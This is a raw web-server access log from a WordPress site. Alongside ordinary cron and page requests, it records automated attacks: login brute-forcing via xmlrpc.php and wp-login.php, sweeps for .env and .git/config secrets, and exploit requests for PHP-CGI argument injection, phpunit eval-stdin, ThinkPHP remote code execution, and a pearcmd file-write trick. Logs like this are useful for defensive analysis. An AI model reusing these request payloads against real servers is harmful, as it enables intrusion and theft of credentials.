36.133.115.36 - - [23/Aug/2025:12:15:00 +0800] "POST /wp-cron.php?doing_wp_cron=1755922500.5097599029541015625000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
123.56.246.71 - - [23/Aug/2025:12:15:00 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36"
123.56.246.71 - - [23/Aug/2025:12:15:01 +0800] "POST /wp-login.php HTTP/1.1" 200 2918 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36"
36.133.115.36 - - [23/Aug/2025:12:17:00 +0800] "POST /wp-cron.php?doing_wp_cron=1755922620.6137070655822753906250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
35.166.69.1 - - [23/Aug/2025:12:17:00 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [23/Aug/2025:12:20:32 +0800] "POST /wp-cron.php?doing_wp_cron=1755922832.4428129196166992187500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
144.91.88.83 - - [23/Aug/2025:12:20:32 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0"
144.91.88.83 - - [23/Aug/2025:12:20:34 +0800] "POST /wp-login.php HTTP/1.1" 200 2918 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36"
36.133.115.36 - - [23/Aug/2025:12:26:04 +0800] "POST /wp-cron.php?doing_wp_cron=1755923164.6180379390716552734375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
173.236.218.94 - - [23/Aug/2025:12:26:04 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0"
173.236.218.94 - - [23/Aug/2025:12:26:05 +0800] "POST /wp-login.php HTTP/1.1" 200 2918 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36"
36.133.115.36 - - [23/Aug/2025:12:31:36 +0800] "POST /wp-cron.php?doing_wp_cron=1755923496.6436660289764404296875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
185.150.190.222 - - [23/Aug/2025:12:31:36 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0"
185.150.190.222 - - [23/Aug/2025:12:31:37 +0800] "POST /wp-login.php HTTP/1.1" 200 2918 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15"
36.133.115.36 - - [23/Aug/2025:12:37:04 +0800] "POST /wp-cron.php?doing_wp_cron=1755923824.6592819690704345703125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
185.87.250.57 - - [23/Aug/2025:12:37:04 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0"
185.87.250.57 - - [23/Aug/2025:12:37:06 +0800] "POST /wp-login.php HTTP/1.1" 200 2918 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67"
123.57.13.121 - - [23/Aug/2025:12:39:46 +0800] "GET / HTTP/1.1" 200 39302 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36"
36.133.115.36 - - [23/Aug/2025:12:41:25 +0800] "POST /wp-cron.php?doing_wp_cron=1755924084.9715769290924072265625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [23/Aug/2025:12:41:25 +0800] "GET / HTTP/1.1" 200 33394 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [23/Aug/2025:12:42:01 +0800] "POST /wp-cron.php?doing_wp_cron=1755924121.8866300582885742187500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
91.224.92.17 - - [23/Aug/2025:12:42:25 +0800] "GET / HTTP/1.1" 200 109837 "-" "-"
36.133.115.36 - - [23/Aug/2025:12:48:08 +0800] "POST /wp-cron.php?doing_wp_cron=1755924488.1275320053100585937500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
143.42.166.15 - - [23/Aug/2025:12:48:08 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36"
143.42.166.15 - - [23/Aug/2025:12:48:09 +0800] "POST /wp-login.php HTTP/1.1" 200 2918 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36"
36.133.115.36 - - [23/Aug/2025:12:53:16 +0800] "POST /wp-cron.php?doing_wp_cron=1755924796.0369100570678710937500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
184.168.117.111 - - [23/Aug/2025:12:53:16 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0"
184.168.117.111 - - [23/Aug/2025:12:53:17 +0800] "POST /wp-login.php HTTP/1.1" 200 2918 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0"
91.224.92.14 - - [23/Aug/2025:12:53:34 +0800] "GET / HTTP/1.1" 200 33394 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
123.13.18.210 - - [23/Aug/2025:12:54:58 +0800] "GET http://cqqizhou.com/ HTTP/1.1" 200 39302 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.87"
36.133.115.36 - - [23/Aug/2025:12:55:20 +0800] "POST /wp-cron.php?doing_wp_cron=1755924920.1006240844726562500000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
61.170.182.252 - - [23/Aug/2025:12:55:20 +0800] "GET http://www.cqqizhou.com/ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.16"
61.170.182.252 - - [23/Aug/2025:12:55:20 +0800] "GET http://cqqizhou.com/ HTTP/1.1" 200 39302 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.16"
36.133.115.36 - - [23/Aug/2025:12:57:11 +0800] "POST /wp-cron.php?doing_wp_cron=1755925031.1040298938751220703125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
182.135.56.12 - - [23/Aug/2025:12:57:11 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
182.135.56.12 - - [23/Aug/2025:12:57:11 +0800] "GET / HTTP/1.1" 200 39302 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
182.135.56.12 - - [23/Aug/2025:12:57:12 +0800] "GET / HTTP/1.1" 200 39302 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
182.135.56.12 - - [23/Aug/2025:12:57:21 +0800] "GET /contacts/ HTTP/1.1" 200 21624 "http://www.cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
36.104.213.99 - - [23/Aug/2025:12:57:53 +0800] "GET http://cqqizhou.com/ HTTP/1.1" 200 39302 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
36.104.213.99 - - [23/Aug/2025:12:58:00 +0800] "GET http://cqqizhou.com/contacts/ HTTP/1.1" 200 21624 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
36.133.115.36 - - [23/Aug/2025:12:59:18 +0800] "POST /wp-cron.php?doing_wp_cron=1755925158.1477689743041992187500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
93.123.109.245 - - [23/Aug/2025:12:59:18 +0800] "GET / HTTP/1.1" 301 5 "-" "l9tcpid/v1.1.0"
93.123.109.245 - - [23/Aug/2025:12:59:19 +0800] "GET /configuration/.env HTTP/1.1" 404 8988 "-" "l9explore/1.2.2"
93.123.109.245 - - [23/Aug/2025:12:59:20 +0800] "GET /.env.bak HTTP/1.1" 404 8989 "-" "l9explore/1.2.2"
93.123.109.245 - - [23/Aug/2025:12:59:22 +0800] "GET /api/.env HTTP/1.1" 404 8989 "-" "l9explore/1.2.2"
93.123.109.245 - - [23/Aug/2025:12:59:26 +0800] "GET /.env.test HTTP/1.1" 404 8989 "-" "l9explore/1.2.2"
93.123.109.245 - - [23/Aug/2025:12:59:28 +0800] "GET /.env.qa HTTP/1.1" 404 8989 "-" "l9explore/1.2.2"
93.123.109.245 - - [23/Aug/2025:12:59:29 +0800] "GET /static../.git/config HTTP/1.1" 404 8989 "-" "l9explore/1.2.2"
93.123.109.245 - - [23/Aug/2025:12:59:30 +0800] "GET /.env.prod HTTP/1.1" 404 8989 "-" "l9explore/1.2.2"
93.123.109.245 - - [23/Aug/2025:12:59:35 +0800] "GET /.env.sandbox HTTP/1.1" 404 8988 "-" "l9explore/1.2.2"
93.123.109.245 - - [23/Aug/2025:12:59:36 +0800] "GET /src/.git/config HTTP/1.1" 404 8989 "-" "l9explore/1.2.2"
34.83.216.245 - - [23/Aug/2025:12:59:37 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
93.123.109.245 - - [23/Aug/2025:12:59:40 +0800] "GET /.env.prod.local HTTP/1.1" 404 8989 "-" "l9explore/1.2.2"
93.123.109.245 - - [23/Aug/2025:12:59:41 +0800] "GET /.env.staging.local HTTP/1.1" 404 8989 "-" "l9explore/1.2.2"
93.123.109.245 - - [23/Aug/2025:12:59:43 +0800] "GET /admin/.git/config HTTP/1.1" 404 8989 "-" "l9explore/1.2.2"
93.123.109.245 - - [23/Aug/2025:12:59:44 +0800] "GET /api/.git/config HTTP/1.1" 404 8990 "-" "l9explore/1.2.2"
36.133.115.36 - - [23/Aug/2025:12:59:46 +0800] "POST /wp-cron.php?doing_wp_cron=1755925186.5281410217285156250000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
93.123.109.245 - - [23/Aug/2025:12:59:46 +0800] "GET /.env.config HTTP/1.1" 404 8989 "-" "l9explore/1.2.2"
93.123.109.245 - - [23/Aug/2025:12:59:48 +0800] "GET /.envrc HTTP/1.1" 404 8989 "-" "l9explore/1.2.2"
93.123.109.245 - - [23/Aug/2025:12:59:49 +0800] "GET /backup/.git/config HTTP/1.1" 404 8989 "-" "l9explore/1.2.2"
93.123.109.245 - - [23/Aug/2025:12:59:51 +0800] "GET /docker-compose.prod.yml HTTP/1.1" 404 8989 "-" "l9explore/1.2.2"
93.123.109.245 - - [23/Aug/2025:12:59:52 +0800] "GET /.env.dist HTTP/1.1" 404 8989 "-" "l9explore/1.2.2"
93.123.109.245 - - [23/Aug/2025:12:59:54 +0800] "GET /core/.git/config HTTP/1.1" 404 8990 "-" "l9explore/1.2.2"
93.123.109.245 - - [23/Aug/2025:12:59:55 +0800] "GET /.env.testing.local HTTP/1.1" 404 8988 "-" "l9explore/1.2.2"
93.123.109.245 - - [23/Aug/2025:12:59:58 +0800] "GET /.env.dev HTTP/1.1" 404 8989 "-" "l9explore/1.2.2"
93.123.109.245 - - [23/Aug/2025:12:59:59 +0800] "GET /.env.production HTTP/1.1" 404 8989 "-" "l9explore/1.2.2"
93.123.109.245 - - [23/Aug/2025:13:00:00 +0800] "GET /assets../.git/config HTTP/1.1" 404 8989 "-" "l9explore/1.2.2"
93.123.109.245 - - [23/Aug/2025:13:00:02 +0800] "GET /files/.git/config HTTP/1.1" 404 8989 "-" "l9explore/1.2.2"
93.123.109.245 - - [23/Aug/2025:13:00:03 +0800] "GET /.env.production.local HTTP/1.1" 404 8989 "-" "l9explore/1.2.2"
93.123.109.245 - - [23/Aug/2025:13:00:04 +0800] "GET /.env.template HTTP/1.1" 404 8990 "-" "l9explore/1.2.2"
93.123.109.245 - - [23/Aug/2025:13:00:06 +0800] "GET /server/.git/config HTTP/1.1" 404 8989 "-" "l9explore/1.2.2"
93.123.109.245 - - [23/Aug/2025:13:00:09 +0800] "GET /config/.git/config HTTP/1.1" 404 8989 "-" "l9explore/1.2.2"
93.123.109.245 - - [23/Aug/2025:13:00:11 +0800] "GET /.env.default HTTP/1.1" 404 8989 "-" "l9explore/1.2.2"
93.123.109.245 - - [23/Aug/2025:13:00:12 +0800] "GET /.env.preprod HTTP/1.1" 404 8989 "-" "l9explore/1.2.2"
93.123.109.245 - - [23/Aug/2025:13:00:14 +0800] "GET /.env.secret HTTP/1.1" 404 8990 "-" "l9explore/1.2.2"
93.123.109.245 - - [23/Aug/2025:13:00:16 +0800] "GET /build/.env HTTP/1.1" 404 8989 "-" "l9explore/1.2.2"
93.123.109.245 - - [23/Aug/2025:13:00:18 +0800] "GET /project/.git/config HTTP/1.1" 404 8989 "-" "l9explore/1.2.2"
93.123.109.245 - - [23/Aug/2025:13:00:19 +0800] "GET /.env.live HTTP/1.1" 404 8989 "-" "l9explore/1.2.2"
93.123.109.245 - - [23/Aug/2025:13:00:20 +0800] "GET /.env.local HTTP/1.1" 404 8989 "-" "l9explore/1.2.2"
93.123.109.245 - - [23/Aug/2025:13:00:25 +0800] "GET /config.json HTTP/1.1" 404 8989 "-" "l9explore/1.2.2"
93.123.109.245 - - [23/Aug/2025:13:00:26 +0800] "GET /cms/.git/config HTTP/1.1" 404 8989 "-" "l9explore/1.2.2"
93.123.109.245 - - [23/Aug/2025:13:00:29 +0800] "GET /.env.testing HTTP/1.1" 404 8989 "-" "l9explore/1.2.2"
93.123.109.245 - - [23/Aug/2025:13:00:30 +0800] "GET /www/.git/config HTTP/1.1" 404 8989 "-" "l9explore/1.2.2"
93.123.109.245 - - [23/Aug/2025:13:00:32 +0800] "GET /app/.git/config HTTP/1.1" 404 8989 "-" "l9explore/1.2.2"
93.123.109.245 - - [23/Aug/2025:13:00:34 +0800] "GET /.env.ci HTTP/1.1" 404 8990 "-" "l9explore/1.2.2"
93.123.109.245 - - [23/Aug/2025:13:00:36 +0800] "GET /.env.dev.local HTTP/1.1" 404 8989 "-" "l9explore/1.2.2"
36.133.115.36 - - [23/Aug/2025:13:02:46 +0800] "POST /wp-cron.php?doing_wp_cron=1755925366.7059810161590576171875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.253 - - [23/Aug/2025:13:02:47 +0800] "GET / HTTP/1.1" 200 151669 "-" "-"
36.133.115.36 - - [23/Aug/2025:13:04:31 +0800] "POST /wp-cron.php?doing_wp_cron=1755925471.4305620193481445312500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
64.227.167.65 - - [23/Aug/2025:13:04:31 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36"
64.227.167.65 - - [23/Aug/2025:13:04:32 +0800] "POST /wp-login.php HTTP/1.1" 200 2918 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [23/Aug/2025:13:10:05 +0800] "POST /wp-cron.php?doing_wp_cron=1755925805.3904919624328613281250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
77.223.120.93 - - [23/Aug/2025:13:10:05 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15"
77.223.120.93 - - [23/Aug/2025:13:10:06 +0800] "POST /wp-login.php HTTP/1.1" 200 2918 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36"
36.133.115.36 - - [23/Aug/2025:13:11:16 +0800] "POST /wp-cron.php?doing_wp_cron=1755925876.9374129772186279296875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
91.224.92.17 - - [23/Aug/2025:13:11:36 +0800] "GET / HTTP/1.1" 200 109837 "-" "-"
36.133.115.36 - - [23/Aug/2025:13:12:48 +0800] "POST /wp-cron.php?doing_wp_cron=1755925968.4275209903717041015625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
77.90.185.47 - - [23/Aug/2025:13:12:48 +0800] "GET /.env.test HTTP/1.1" 404 8990 "-" "Mozilla/5.0 zgrab/0.x"
36.133.115.36 - - [23/Aug/2025:13:19:05 +0800] "POST /wp-cron.php?doing_wp_cron=1755926345.9429171085357666015625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
104.193.172.81 - - [23/Aug/2025:13:19:06 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
120.133.64.135 - - [23/Aug/2025:13:19:18 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Edg/128.0.0.0"
120.133.64.135 - - [23/Aug/2025:13:19:19 +0800] "GET / HTTP/1.1" 200 165624 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Edg/128.0.0.0"
36.133.115.36 - - [23/Aug/2025:13:31:09 +0800] "POST /wp-cron.php?doing_wp_cron=1755927069.4458210468292236328125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
160.30.200.25 - - [23/Aug/2025:13:31:09 +0800] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 31381 "-" "libredtail-http"
160.30.200.25 - - [23/Aug/2025:13:31:10 +0800] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 151669 "-" "libredtail-http"
160.30.200.25 - - [23/Aug/2025:13:31:10 +0800] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
160.30.200.25 - - [23/Aug/2025:13:31:10 +0800] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
160.30.200.25 - - [23/Aug/2025:13:31:10 +0800] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
160.30.200.25 - - [23/Aug/2025:13:31:10 +0800] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
160.30.200.25 - - [23/Aug/2025:13:31:10 +0800] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
160.30.200.25 - - [23/Aug/2025:13:31:11 +0800] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
160.30.200.25 - - [23/Aug/2025:13:31:11 +0800] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
160.30.200.25 - - [23/Aug/2025:13:31:11 +0800] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
160.30.200.25 - - [23/Aug/2025:13:31:11 +0800] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
160.30.200.25 - - [23/Aug/2025:13:31:11 +0800] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
160.30.200.25 - - [23/Aug/2025:13:31:11 +0800] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
160.30.200.25 - - [23/Aug/2025:13:31:11 +0800] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
160.30.200.25 - - [23/Aug/2025:13:31:11 +0800] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
160.30.200.25 - - [23/Aug/2025:13:31:11 +0800] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
160.30.200.25 - - [23/Aug/2025:13:31:11 +0800] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
160.30.200.25 - - [23/Aug/2025:13:31:11 +0800] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
160.30.200.25 - - [23/Aug/2025:13:31:11 +0800] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
160.30.200.25 - - [23/Aug/2025:13:31:11 +0800] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
160.30.200.25 - - [23/Aug/2025:13:31:11 +0800] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
160.30.200.25 - - [23/Aug/2025:13:31:11 +0800] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
160.30.200.25 - - [23/Aug/2025:13:31:11 +0800] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
160.30.200.25 - - [23/Aug/2025:13:31:12 +0800] "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
160.30.200.25 - - [23/Aug/2025:13:31:12 +0800] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
160.30.200.25 - - [23/Aug/2025:13:31:12 +0800] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
160.30.200.25 - - [23/Aug/2025:13:31:12 +0800] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
160.30.200.25 - - [23/Aug/2025:13:31:12 +0800] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
160.30.200.25 - - [23/Aug/2025:13:31:12 +0800] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
160.30.200.25 - - [23/Aug/2025:13:31:12 +0800] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
160.30.200.25 - - [23/Aug/2025:13:31:12 +0800] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
160.30.200.25 - - [23/Aug/2025:13:31:12 +0800] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
160.30.200.25 - - [23/Aug/2025:13:31:12 +0800] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
160.30.200.25 - - [23/Aug/2025:13:31:12 +0800] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
160.30.200.25 - - [23/Aug/2025:13:31:12 +0800] "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
160.30.200.25 - - [23/Aug/2025:13:31:12 +0800] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
160.30.200.25 - - [23/Aug/2025:13:31:12 +0800] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
160.30.200.25 - - [23/Aug/2025:13:31:12 +0800] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
160.30.200.25 - - [23/Aug/2025:13:31:12 +0800] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
160.30.200.25 - - [23/Aug/2025:13:31:13 +0800] "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 200 64855 "-" "libredtail-http"
160.30.200.25 - - [23/Aug/2025:13:31:13 +0800] "GET /public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 27 "-" "libredtail-http"
160.30.200.25 - - [23/Aug/2025:13:31:14 +0800] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php HTTP/1.1" 200 151669 "-" "libredtail-http"
160.30.200.25 - - [23/Aug/2025:13:31:15 +0800] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 200 151669 "-" "libredtail-http"
160.30.200.25 - - [23/Aug/2025:13:31:16 +0800] "GET /containers/json HTTP/1.1" 301 5 "-" "libredtail-http"
160.30.200.25 - - [23/Aug/2025:13:31:19 +0800] "GET /containers/json HTTP/1.1" 301 5 "-" "libredtail-http"
36.133.115.36 - - [23/Aug/2025:13:31:56 +0800] "POST /wp-cron.php?doing_wp_cron=1755927116.1589570045471191406250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
184.168.117.111 - - [23/Aug/2025:13:31:56 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0"
184.168.117.111 - - [23/Aug/2025:13:31:57 +0800] "POST /wp-login.php HTTP/1.1" 200 2918 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [23/Aug/2025:13:38:00 +0800] "POST /wp-cron.php?doing_wp_cron=1755927480.5336101055145263671875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
